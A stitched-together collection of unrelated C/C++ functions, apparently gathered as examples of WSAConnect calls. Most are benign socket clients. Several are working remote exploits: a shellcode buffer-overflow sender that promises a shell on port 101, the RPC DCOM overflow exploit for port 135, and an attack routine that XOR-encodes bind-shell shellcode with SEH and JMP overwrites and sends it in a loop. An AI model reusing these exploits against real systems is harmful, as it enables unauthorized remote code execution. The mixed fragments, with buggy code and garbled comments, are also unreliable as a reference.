/* No signal delivery during connect. */ int pgwin32_connect(SOCKET s, const struct sockaddr * addr, int addrlen) { int r; r = WSAConnect(s, addr, addrlen, NULL, NULL, NULL, NULL); if (r == 0) return 0; if (WSAGetLastError() != WSAEWOULDBLOCK) { TranslateSocketError(); return -1; } while (pgwin32_waitforsinglesocket(s, FD_CONNECT) == 0) { /* Loop endlessly as long as we are just delivering signals */ } return 0; }
/*connect host:port*/ SOCKET Conecta(char *Host, short puerto) { /*struct for make the socket*/ WSADATA wsaData; SOCKET Winsock;//listener socket /*two structures for connect*/ struct sockaddr_in Winsock_In; struct hostent *Ip; /*start the socket*/ WSAStartup(MAKEWORD(2,2), &wsaData); /*make*/ Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); //check socket status if(Winsock==INVALID_SOCKET) { /*exit*/ WSACleanup(); return -1; } /*complete the struct*/ Ip=gethostbyname(Host); Winsock_In.sin_port=htons(puerto); Winsock_In.sin_family=AF_INET; Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr))); /*connect*/ if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR) { /*end*/ WSACleanup(); return -1; } return Winsock; }
int WEventSocket::Connect(const char *host,unsigned short int port) { HOSTENT *hostent=NULL; hostent=gethostbyname(host); // Check for error if(hostent==NULL) { Close(); return SOCKET_ERROR; } sockaddr_in addr; memset(&addr,0,sizeof(sockaddr_in)); addr.sin_family=AF_INET; addr.sin_addr.S_un.S_addr=*((unsigned long *)hostent->h_addr_list[0]); addr.sin_port=htons(port); // Connect the socket to the listening server socket int ret=WSAConnect(m_hSocket,(sockaddr *)&addr,sizeof(sockaddr_in),NULL,NULL,NULL,NULL); return ret; }
BOOL CTcpSocket::Connect(LPCSTR pszTargetIP,USHORT nTargetPort) { BOOL bIsIP = FALSE; sockaddr_in *psi = NULL; unsigned long ulIP = inet_addr(pszTargetIP); if( INADDR_NONE == ulIP ) { hostent *pHostEnt = gethostbyname(pszTargetIP); if(pHostEnt && (pHostEnt->h_addrtype == AF_INET || pHostEnt->h_addrtype == AF_INET6)) { psi = (sockaddr_in *)pHostEnt->h_addr; } } else { bIsIP = TRUE; } sockaddr_in si; if (bIsIP) { si.sin_addr.s_addr = inet_addr(pszTargetIP); } else { si.sin_addr.s_addr = psi->sin_addr.s_addr; } si.sin_port = htons(nTargetPort); si.sin_family = AF_INET; int bRes = WSAConnect(m_TcpSock,(sockaddr *)&si,sizeof(si),NULL,NULL,NULL,NULL); return bRes == 0; }
// Connect this CConnection object to a remote computer on the Internet // Takes pAddress, a Windows Sockets structure that holds an IP address, and takes the port number seprately // Returns true if connected BOOL CConnection::ConnectTo(const IN_ADDR* pAddress, WORD nPort) { // Make sure the socket isn't already connected somehow if ( IsValid() ) return FALSE; // Make sure we have an address and a nonzero port number if ( pAddress == NULL || nPort == 0 ) return FALSE; // S_un.S_addr is the IP as a single unsigned 4-byte long if ( pAddress->S_un.S_addr == 0 ) return FALSE; // The IP address is in the security list of government and corporate addresses we want to avoid if ( Security.IsDenied( pAddress ) ) { // Report that we aren't connecting to this IP address and return false theApp.Message( MSG_ERROR, IDS_NETWORK_SECURITY_OUTGOING, (LPCTSTR)CString( inet_ntoa( *pAddress ) ) ); return FALSE; } // The IN_ADDR structure we just got passed isn't the same as the one already stored in this object if ( pAddress != &m_pHost.sin_addr ) { // Zero the memory of the entire SOCKADDR_IN structure m_pHost, and then copy in the sin_addr part ZeroMemory( &m_pHost, sizeof( m_pHost ) ); m_pHost.sin_addr = *pAddress; } // Fill in more parts of the m_pHost structure m_pHost.sin_family = AF_INET; // PF_INET means just normal IPv4, not IPv6 yet m_pHost.sin_port = htons( nPort ); // Copy the port number into the m_pHost structure m_sAddress = inet_ntoa( m_pHost.sin_addr ); // Save the IP address as a string of text UpdateCountry(); // Create a socket and store it in m_hSocket // Normal IPv4 not IPv6, and the two-way sequenced reliable byte streams of TCP, not the datagrams of UDP m_hSocket = socket( PF_INET, SOCK_STREAM, IPPROTO_TCP ); // Choose asynchronous, non-blocking reading and writing on our new socket DWORD dwValue = 1; ioctlsocket( m_hSocket, FIONBIO, &dwValue ); // Call Windows Sockets ioctlsocket to control the input/output mode of our new socket // Give it our new socket // Select the option for blocking i/o, should the program wait on read and write calls, or keep going? // Nonzero, it should keep going // If the OutHost string in connection settings has an IP address written in it if ( Settings.Connection.OutHost.GetLength() ) { // Read the text and copy the IP address and port into a new local MFC SOCKADDR_IN structure called pOutgoing SOCKADDR_IN pOutgoing; Network.Resolve( Settings.Connection.OutHost, 0, &pOutgoing ); // S_addr is the IP address as a single long number, if it's not zero if ( pOutgoing.sin_addr.S_un.S_addr ) { // Call bind in Windows Sockets to associate the local address with the socket bind( m_hSocket, // Our socket (SOCKADDR*)&pOutgoing, // The IP address this computer appears to have on the Internet (do) sizeof( SOCKADDR_IN ) ); // Tell bind how many bytes it can read at the pointer } } DestroyBuffers(); // Try to connect to the remote computer if ( WSAConnect( m_hSocket, // Our socket (SOCKADDR*)&m_pHost, // The remote IP address and port number sizeof( SOCKADDR_IN ), // How many bytes the function can read NULL, NULL, NULL, NULL ) ) // No advanced features { // If no error occurs, WSAConnect returns 0, so if we're here an error happened int nError = WSAGetLastError(); // Get the last Windows Sockets error number // An error of "would block" is normal because connections can't be made instantly and this is a non-blocking socket if ( nError != WSAEWOULDBLOCK ) { CNetwork::CloseSocket( m_hSocket, true ); if ( nError != 0 ) Statistics.Current.Connections.Errors++; return FALSE; } } CreateBuffers(); // Record that we initiated this connection, and when it happened m_bInitiated = TRUE; m_tConnected = GetTickCount(); // Record one more outgoing connection in the statistics Statistics.Current.Connections.Outgoing++; // Connection successfully attempted return TRUE; }
void EventTCPSocket::connect( const wstring& host, const wstring& service, Protocol protocol ) { if ( mState != State_Closed ) EXCEPT( L"Cannot connect, socket is not closed" ); mState = State_Connecting; ADDRINFOW resolve; PADDRINFOW address = NULL; PADDRINFOW resolved = NULL; memset( &resolve, NULL, sizeof( ADDRINFOW ) ); resolve.ai_family = util::protocolToFamily( protocol ); resolve.ai_socktype = SOCK_STREAM; resolve.ai_protocol = IPPROTO_TCP; if ( GetAddrInfoW( host.c_str(), service.c_str(), &resolve, &resolved ) ) { mState = State_Closed; EXCEPT_WSA( L"Couldn't resolve" ); } for ( address = resolved; address != nullptr; address = address->ai_next ) { if ( address->ai_socktype != SOCK_STREAM || address->ai_protocol != IPPROTO_TCP ) continue; mSocket = WSASocketW( address->ai_family, address->ai_socktype, address->ai_protocol, nullptr, 0, mOverlapped ? WSA_FLAG_OVERLAPPED : 0 ); if ( mSocket == INVALID_SOCKET ) continue; if ( !WSAConnect( mSocket, address->ai_addr, (int)address->ai_addrlen, nullptr, nullptr, nullptr, nullptr ) ) break; closesocket( mSocket ); } if ( address == nullptr ) { mState = State_Closed; EXCEPT_WSA( L"Couldn't connect" ); } mBound = true; mConnectionInfo.update( mSocket, false ); mConnectionInfo.update( mSocket, true ); if ( WSAEventSelect( mSocket, mNetworkEvent, FD_READ | FD_CLOSE ) == SOCKET_ERROR ) EXCEPT_WSA( L"Couldn't select socket events" ); mState = State_Connected; for ( SocketListener* listener : mListeners ) if ( listener->connectCallback( this ) ) break; }
//---------------------------------------------------------------------- // connect //---------------------------------------------------------------------- bool SocketConnection::connect() { ConnectionDescriptionPtr description = _getDescription(); LBASSERT( description->type == CONNECTIONTYPE_TCPIP ); if( !isClosed( )) return false; if( description->port == 0 ) return false; if( description->getHostname().empty( )) description->setHostname( "127.0.0.1" ); sockaddr_in address; if( !_parseAddress( description, address )) { LBWARN << "Can't parse connection parameters" << std::endl; return false; } _setState( STATE_CONNECTING ); if( !_createSocket( )) return false; if( address.sin_addr.s_addr == 0 ) { LBWARN << "Refuse to connect to 0.0.0.0" << std::endl; close(); return false; } #ifdef _WIN32 const bool connected = WSAConnect( _readFD, (sockaddr*)&address, sizeof( address ), 0, 0, 0, 0 ) == 0; #else int nTries = 10; while( nTries-- ) { const bool connected = (::connect( _readFD, (sockaddr*)&address, sizeof( address )) == 0); if( connected ) break; switch( errno ) { case EINTR: // Happens sometimes, but looks harmless LBDEBUG << "connect: " << lunchbox::sysError << ", retrying" << std::endl; lunchbox::sleep( 5 /*ms*/ ); break; default: nTries = 0; break; } } const bool connected = nTries > 0; #endif if( !connected ) { LBDEBUG << "Could not connect to '" << description->getHostname() << ":" << description->port << "': " << lunchbox::sysError << std::endl; close(); return false; } _initAIORead(); _setState( STATE_CONNECTED ); LBDEBUG << "Connected " << description->toString() << std::endl; return true; }
int main(int argc,char *argv[]) { ver(); if ((argc<2)||(argc>3)){usage(argv[0]);return -1;} if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;} int ip=htonl(inet_addr(argv[1])), sz, port, sizev, sizew, sizex, sizey, sizez, v, w, x, y, z; if (argc=3){port=atoi(argv[2]);} else port=2000; SOCKET s; struct fd_set mask; struct timeval timeout; struct sockaddr_in server; s=socket(AF_INET,SOCK_STREAM,0); if (s=INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;} server.sin_family=AF_INET; server.sin_addr.s_addr=htonl(ip); server.sin_port=htons(port); WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL); timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask); switch(select(s+1,NULL,&mask,NULL,&timeout)) { case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;} case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;} default: if(FD_ISSET(s,&mask)) { cout<<"[+] connected, constructing the payload..."<<endl; Sleep(1000); sizev=5; sizew=88; sizey=800-sizeof(scode); sizex=5; sizez=20; sz=sizev+sizew+sizex+sizez+sizeof(scode)+sizey; memset(payload,0,sizeof(payload)); strcat(payload,""); for (v=0;v<sizev;v++){strcat(payload,"\x61");} strcat(payload,"\x66\x8b\xf3"); strcat(payload,"\x66\x83\xc6\x09"); strcat(payload,"\xff\xe6"); for (w=0;w<sizew;w++){strcat(payload,"\x61");} strcat(payload,"\xeb"); strcat(payload,"\x9d\x61\x61"); strcat(payload,jmpebxw2k); for (x=0;x<sizex;x++){strcat(payload,"\x90");} strcat(payload,scode); for (y=0;y<sizey;y++){strcat(payload,"\x61");} for (z=0;z<sizez;z++){strcat(payload,"~");} if (send(s,payload,strlen(payload),0)=SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;} cout<<"[+] size of payload: "<<sz<<endl; cout<<"[+] payload send, connect the port 101 to get a shell."<<endl; return 0; } } closesocket(s); WSACleanup(); return 0; }
/*------------------------------------------------------------------------------------------------------------------------------------- FUNCTION: Client INTERFACE: DWORD WINAPI Client(LPVOID commInfo) RETURNS: DWORD NOTES: Client will set up a socket depending on TCP or UDP. Once a socket is created, the host server information is saved into a structure. If a file is specified, the file is written to the server instead of junk data. If TCP is specified, the socket will wait until all data is sent before free'ing resources. --------------------------------------------------------------------------------------------------------------------------------------*/ DWORD WINAPI Client(LPVOID commInfo) { NetworkInfo* netInfo = (NetworkInfo*)commInfo; DWORD ret; int data_size = BUFFERLENGTH; SOCKET sd = 0; struct sockaddr_in server; struct hostent *hp; SYSTEMTIME stStartTime, stEndTime; WSADATA stWSAData; WORD wVersionRequested = MAKEWORD(2, 2); int numOfPackets, sizeOfPackets, protocol; LPSOCKET_INFORMATION SI; //Remove session if one exists already WSACleanup(); if (netInfo == NULL) { formatMessage("Saving communication information failed"); ExitThread(1); } formatMessage("Starting Client"); char* host = netInfo->ipAddress; char* port = netInfo->port; numOfPackets = netInfo->numberOfPackets; sizeOfPackets = netInfo->sizeOfPackets; protocol = netInfo->protocol; char* sbuf; char* controlBuf = new char[BUFFERLENGTH]; char* EOFBuf = new char[BUFFERLENGTH]; //Sending file is specified if (sendFile == true) { if ((clientFP = fopen("WarandPeace.txt", "r+b")) == NULL) { formatMessage("Opening file failed"); return 1; } fseek(clientFP, 0L, SEEK_END); int newNumOfPackets = (ftell(clientFP) /sizeOfPackets); fseek(clientFP, 0L, SEEK_SET); if (newNumOfPackets <= 0) { formatMessage("Reading file size failed"); ExitThread(1); } numOfPackets = newNumOfPackets; netInfo->numberOfPackets = newNumOfPackets; } if ((ret = WSAStartup(wVersionRequested, &stWSAData)) != 0) { formatMessage("WSAStartup failed"); ExitThread(1); } //TCP Socket if (protocol == 1) { if ((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { formatMessage("Cannot create TCP socket"); ExitThread(1); } } //UDP Socket else if(protocol == 2) { if ((sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { formatMessage("Cannot create UDP socket"); ExitThread(1); } } // Initialize and set up the address structure memset((char *)&server, 0, sizeof(struct sockaddr_in)); server.sin_family = AF_INET; server.sin_port = htons(atoi(port)); if ((hp = gethostbyname(host)) == NULL) { formatMessage("Unknown server address"); ExitThread(1); } // Copy the server address memcpy((char *)&server.sin_addr, hp->h_addr, hp->h_length); //TCP Connect if (protocol == 1) { // Connecting to the server if (WSAConnect(sd, (struct sockaddr *)&server, sizeof(server), 0, 0, 0, NULL) == -1) { formatMessage("Can't connect to server"); ExitThread(1); } } //Creating Socket Info struct if ((SI = (LPSOCKET_INFORMATION)GlobalAlloc(GPTR, sizeof(SOCKET_INFORMATION))) == NULL) { formatMessage("GlobalAlloc() failed with error"); ExitThread(1); } //Copy socket SI->Socket = sd; //Send control data formatControlBuffer(controlBuf, numOfPackets, sizeOfPackets); formatEOTBuffer(EOFBuf); if (sendFile == true) { //TCP send if (protocol == 1) { sendControlTCP(SI, controlBuf, strlen(controlBuf)); sendfileDataTCP(SI, sizeOfPackets); sendControlTCP(SI, EOFBuf, strlen(EOFBuf)); SleepEx(INFINITE, TRUE); } //UDP send else { sendControlUDP(SI, server, controlBuf, strlen(controlBuf)); sendfileDataUDP(SI, server, sizeOfPackets); sendControlUDP(SI, server, EOFBuf, strlen(EOFBuf)); } fclose(clientFP); } else { sbuf = new char[sizeOfPackets]; // data is a, b, c, ..., z, a, b,... for (int i = 0; i < sizeOfPackets; i++) { sbuf[i] = 'z'; } //TCP send if (protocol == 1) { sendControlTCP(SI, controlBuf, strlen(controlBuf)); sendDataTCP(SI, sbuf, sizeOfPackets, numOfPackets); sendControlTCP(SI, EOFBuf, strlen(EOFBuf)); SleepEx(INFINITE, TRUE); } //UDP send else { sendControlUDP(SI, server, controlBuf, sizeOfPackets); sendDataUDP(SI, server, sbuf, sizeOfPackets, numOfPackets); sendControlUDP(SI, server, EOFBuf, strlen(EOFBuf)); } delete[](sbuf); } formatMessage("Terminating Client"); //Remove resources delete[](EOFBuf); delete[](controlBuf); delete(commInfo); closesocket(sd); closesocket(SI->Socket); GlobalFree(SI); ExitThread(0); }
//---------------------------------------------------------------------- // listen //---------------------------------------------------------------------- bool PGMConnection::listen() { EQASSERT( _description->type == CONNECTIONTYPE_PGM ); if( _state != STATE_CLOSED ) return false; _state = STATE_CONNECTING; _fireStateChanged(); sockaddr_in address; const size_t size = sizeof( sockaddr_in ); if( !_parseAddress( address )) { EQWARN << "Can't parse connection parameters" << std::endl; return false; } //-- create a 'listening' read socket _readFD = _initSocket( address ); if( _readFD == INVALID_SOCKET || !_setupReadSocket( )) { close(); return false; } const bool listening = (::listen( _readFD, 10 ) == 0); if( !listening ) { EQWARN << "Could not listen on socket: " << base::sysError << std::endl; close(); return false; } // get listening socket parameters socklen_t used = size; getsockname( _readFD, (struct sockaddr *)&address, &used ); _description->port = ntohs( address.sin_port ); const std::string& hostname = _description->getHostname(); if( hostname.empty( )) { if( address.sin_addr.s_addr == INADDR_ANY ) { char cHostname[256]; gethostname( cHostname, 256 ); _description->setHostname( cHostname ); } else _description->setHostname( inet_ntoa( address.sin_addr )); } _initAIOAccept(); //-- create a connected 'write' socket address.sin_family = AF_INET; address.sin_addr.s_addr = htonl( INADDR_ANY ); address.sin_port = htons( 0 ); memset( &(address.sin_zero), 0, 8 ); // zero the rest _writeFD = _initSocket( address ); if( _writeFD == INVALID_SOCKET || !_setupSendSocket( )) { close(); return false; } _parseAddress( address ); #ifdef _WIN32 const bool connected = WSAConnect( _writeFD, (sockaddr*)&address, size, 0, 0, 0, 0 ) == 0; #else const bool connected = (::connect( _readFD, (sockaddr*)&address, size ) == 0); #endif if( !connected ) { EQWARN << "Could not connect to '" << _description->getHostname() << ":" << _description->port << "': " << base::sysError << std::endl; close(); return false; } _state = STATE_LISTENING; _fireStateChanged(); EQINFO << "Listening on " << _description->getHostname() << "[" << inet_ntoa( address.sin_addr ) << "]:" << _description->port << " (" << _description->toString() << ")" << std::endl; return true; }
void main(int argc,char ** argv) { WSADATA WSAData; SOCKET sock; int len,len1; SOCKADDR_IN addr_in; short port=135; unsigned char buf1[0x1000]; unsigned char buf2[0x1000]; printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n"); printf("Code by FlashSky,Flashsky xfocus org\n"); printf("Welcome to our Site: http://www.xfocus.org\n"); printf("Welcome to our Site: http://www.venustech.com.cn\n"); if(argc!=2) { printf("%s targetIP \n",argv[0]); printf("for cn w2k server sp3/sp4+ms03-26\n"); } if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { printf("WSAStartup error.Error:%d\n",WSAGetLastError()); return; } addr_in.sin_family=AF_INET; addr_in.sin_port=htons(port); addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]); if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) { printf("Socket failed.Error:%d\n",WSAGetLastError()); return; } len1=sizeof(request1); len=sizeof(sccnsp3sp4); if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) { printf("Connect failed.Error:%d",WSAGetLastError()); return; } memcpy(buf2,request1,sizeof(request1)); *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sccnsp3sp4)/2; *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sccnsp3sp4)/2; memcpy(buf2+len1,request2,sizeof(request2)); len1=len1+sizeof(request2); memcpy(buf2+len1,sccnsp3sp4,sizeof(sccnsp3sp4)); len1=len1+sizeof(sccnsp3sp4); memcpy(buf2+len1,request3,sizeof(request3)); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4)); len1=len1+sizeof(request4); *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc; *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc; *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc; *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc; *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc; *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc; *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc; *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc; if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR) { printf("Send failed.Error:%d\n",WSAGetLastError()); return; } len=recv(sock,buf1,1000,NULL); if (send(sock,buf2,len1,0)==SOCKET_ERROR) { printf("Send failed.Error:%d\n",WSAGetLastError()); return; } // len=recv(sock,buf1,1024,NULL); }
void AsynchronousClientClass::Init(const HWND& hwnd) { // Server IP 입력과 DB Login 을 하는 팝업 Dialog DialogBox(g_hInst, MAKEINTRESOURCE(IDD_DIALOG1), hwnd, AboutDlgProc); //inputServerIP(); // init Winsock int number_error = WSAStartup(MAKEWORD(2, 2), &m_wsadata); if (number_error != 0) { int err_no = WSAGetLastError(); error_quit(L"WSAStartup ERROR", err_no); } m_sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); if (INVALID_SOCKET == m_sock) { int err_no = WSAGetLastError(); error_quit(L"WSASocket()", err_no); } // connect SOCKADDR_IN serveraddr; ZeroMemory(&serveraddr, sizeof(serveraddr)); serveraddr.sin_family = AF_INET; serveraddr.sin_addr.s_addr = inet_addr(m_serverIP); serveraddr.sin_port = htons(SERVERPORT); m_retval = WSAConnect(m_sock, (SOCKADDR *)&serveraddr, sizeof(serveraddr), NULL, NULL, NULL, NULL); if (SOCKET_ERROR == m_retval) { // 비동기 소켓이라 그냥 리턴, 검사 해주어야 함 if (WSAGetLastError() != WSAEWOULDBLOCK) { int err_no = WSAGetLastError(); error_quit(L"WSAConnect()", err_no); } } // DB 연동하기 위한 함수 Login_access(); printf("\nLogin SUCCESSED\n"); // WSAAsyncSelect - 넌블로킹 소켓 자동 전환 m_hWnd = hwnd; if (NULL == m_hWnd) { #ifdef _DEBUG printf("Cannot find Consol Window, ERROR : %d\n", __LINE__); #endif exit(-1); } m_retval = WSAAsyncSelect(m_sock, m_hWnd, WM_SOCKET, FD_READ | FD_CLOSE); if (SOCKET_ERROR == m_retval) { int err_no = WSAGetLastError(); error_quit(L"ioctlsocket()", err_no); } m_wsa_recvbuf.buf = reinterpret_cast<CHAR*>(m_recvbuf); m_wsa_recvbuf.len = MAX_BUF_SIZE; m_wsa_sendbuf.buf = reinterpret_cast<CHAR*>(m_sendbuf); m_wsa_sendbuf.len = MAX_BUF_SIZE; LuaScript script("script/AI_default_status.lua"); MAX_AI_SLIME = script.get<int>("ai_status_slime2.howMany"); MAX_AI_GOBLIN = script.get<int>("ai_status_goblin2.howMany"); MAX_AI_BOSS = script.get<int>("ai_status_boss.howMany"); MAX_AI_NUM = MAX_AI_BOSS; #ifdef _DEBUG //system("cls"); printf("Connected with SERVER\n"); #endif }
//---------------------------------------------------------------- // CImpIRestrictedProcess::RP_WSPConnect() // //---------------------------------------------------------------- STDMETHODIMP CImpIRestrictedProcess::RP_WSPConnect( IN RPC_SOCKADDR_IN *pInAddr, IN long lAddrLen, IN RPC_WSABUF *pCallerData, OUT RPC_WSABUF *pCalleeData, IN RPC_QOS *pSQOS, IN RPC_QOS *pGQOS, IN DWORD dwTargetPid, OUT DWORD *pTargetSocket, OUT long *pError ) { int iRet; HRESULT hr; BOOL fInherit; DWORD dwSourcePid; DWORD dwAccess; DWORD dwOptions; NTSTATUS NtStatus; HANDLE hSourceProcess; HANDLE hSourceHandle; HANDLE hTargetProcess; *pError = NO_ERROR; dwSourcePid = GetCurrentProcessId(); if (!dwSourcePid) { *pError = GetLastError(); return NOERROR; } if (m_Socket == INVALID_SOCKET) { *pError = WSAEACCES; closesocket(m_Socket); m_Socket = INVALID_SOCKET; return NOERROR; } // // Check to make sure the restricted client is connecting only // to a server that we allow. // hr = IsValidAddr( (char*)&(pInAddr->sin_addr), sizeof(ULONG) ); #ifdef DBG_ALWAYS_RESTRICTED DbgPrint("RP_WSPConnect(): IsValidAdder(): %s\n", (hr == S_OK)? "TRUE" : "FALSE" ); hr = S_OK; #endif if (S_OK != hr) { *pError = WSAEACCES; closesocket(m_Socket); m_Socket = INVALID_SOCKET; return NOERROR; } // Ok, do the connect() on behalf of the restricted client iRet = WSAConnect( m_Socket, (struct sockaddr *)pInAddr, lAddrLen, (WSABUF*)pCallerData, (WSABUF*)pCalleeData, (QOS*)pSQOS, (QOS*)pGQOS ); if (iRet == SOCKET_ERROR) { *pError = WSAGetLastError(); closesocket(m_Socket); m_Socket = INVALID_SOCKET; return NOERROR; } // Get a handle to our own process (to be used by DuplicateHandle()). hSourceProcess = OpenProcess( PROCESS_DUP_HANDLE, TRUE, dwSourcePid ); if (!hSourceProcess) { *pError = GetLastError(); closesocket(m_Socket); m_Socket = INVALID_SOCKET; return NOERROR; } // Get a handle to the restricted process hTargetProcess = OpenProcess( PROCESS_DUP_HANDLE, TRUE, dwTargetPid ); if (!hTargetProcess) { *pError = GetLastError(); closesocket(m_Socket); m_Socket = INVALID_SOCKET; CloseHandle(hSourceProcess); return NOERROR; } // Ok, duplicate the socket into the restricted client. dwAccess = 0; fInherit = FALSE; dwOptions = DUPLICATE_SAME_ACCESS; if (!DuplicateHandle(hSourceProcess, (HANDLE)m_Socket, hTargetProcess, (HANDLE*)pTargetSocket, dwAccess, fInherit, dwOptions )) { *pError = GetLastError(); } // No longer need a local copy of the open socket. closesocket(m_Socket); m_Socket = INVALID_SOCKET; // Done with the process handles. CloseHandle(hSourceProcess); CloseHandle(hTargetProcess); return NOERROR; }
int attack(char *ip1,bool atack) { unsigned char rawData[1036]; memcpy(rawData,rawData1,1036); unsigned char shellcode[50000]; char ip[200]; strcpy(ip,ip1); WSADATA WSAData; SOCKET sock; int len,len1; SOCKADDR_IN addr_in; short port=135; unsigned char buf1[50000]; unsigned char buf2[50000]; printf("%s\n",ip); //printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n"); //printf("Code by FlashSky,Flashsky xfocus org\n"); //printf("Welcome to our Site: http://www.xfocus.org\n"); //printf("Welcome to our Site: http://www.venustech.com.cn\n"); /* if(argc!=3) { printf("%s targetIP targetOS\ntargets:\n",argv[0]); for(int i=0;i<sizeof(target_os)/sizeof(v);i++) printf("%d - %s\n",i,target_os.target); printf("\n%x\n",GETSTRCS(argv[1])); return; } */ /* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { printf("WSAStartup error.Error:%d\n",WSAGetLastError()); return; } */ addr_in.sin_family=AF_INET; addr_in.sin_port=htons(port); addr_in.sin_addr.S_un.S_addr=inet_addr(ip); if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) { printf("Socket failed.Error:%d\n",WSAGetLastError()); return 0; } len1=sizeof(request1); len=sizeof(rawData); if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) { printf("%s - connect failed\n",ip); return 0; } int vers=!version(ip,sock); // printf("%d\n",vers); // return; // int vers=1; FILE *fp; //чит ем п кет // fp=fopen("shellcode","rb"); // fread(rawData,1,1036,fp); // fclose(fp); //теперь нужно ссчит ть непосредственно исполняемый шеллкод! fp=fopen("bshell2","rb"); int sz=fread(shellcode,1,1024,fp); fclose(fp); // printf("%d\n",sz); for(int i=0; i<sz; i++) rawData[i+0x71]=shellcode; // fp=fopen("badfile.exe","rb"); // unsigned int sz1=fread(shellcode,1,50000,fp); // fclose(fp); // for(i=0;i<sz1;i++) // rawData[i+0x240]=shellcode; // fp=fopen("pac","wb"); // fwrite(rawData,1,1036,fp); // fclose(fp); // return; //Перед тем к к ксорить з пишем дрес свободного HEAP'a // DWORD heap=0x00180000; // int k=vers; // vers=1; // *(DWORD *)(rawData+0xae)=target_os[vers].heap; *(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap; //.еперь нужно проксорить н ш код, для того чтобы получить нужный н м XOR(rawData,0x71,sz,0x99); // XOR(rawData,0x240,sz1,0x99); //. к же н м нужно з пис ть нужный н м SEH и JMP DWORD seh=target_os[vers].seh; DWORD jmp=target_os[vers].jmp; *(DWORD *)(rawData+0x22a)=jmp; *(DWORD *)(rawData+0x22e)=seh; // *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz)); *(WORD *)(rawData+0x62)=sz; memcpy(buf2,request1,sizeof(request1)); *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2; *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2; memcpy(buf2+len1,request2,sizeof(request2)); len1=len1+sizeof(request2); memcpy(buf2+len1,rawData,sizeof(rawData)); len1=len1+sizeof(rawData); memcpy(buf2+len1,request3,sizeof(request3)); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4)); len1=len1+sizeof(request4); *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc; *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc; *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc; *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc; *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc; *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc; *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc; *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc; closesocket(sock); if(atack) { sock=socket(2,1,0); WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL); if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR) { printf("%s - send failed %d\n",ip,WSAGetLastError()); return 0; } else { printf("%s - send exploit to %s\n",ip,target_os[vers].target); } len=recv(sock,(char *)buf1,1000,NULL); bool ft=1; if(ft) { int i=0; while(1) { if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR) { printf("\nSend failed.Error:%d\n",WSAGetLastError()); return 0; } else { printf("\r%d",++i); } //Sleep(1000); } } send(sock,(const char *)buf2,len1,0); closesocket(sock); } else fprintf(fp1,"%s %s\n",target_os[vers].target,ip); // fp=fopen("pac","wb"); // fwrite(rawData,1,1036,fp); // fclose(fp); }
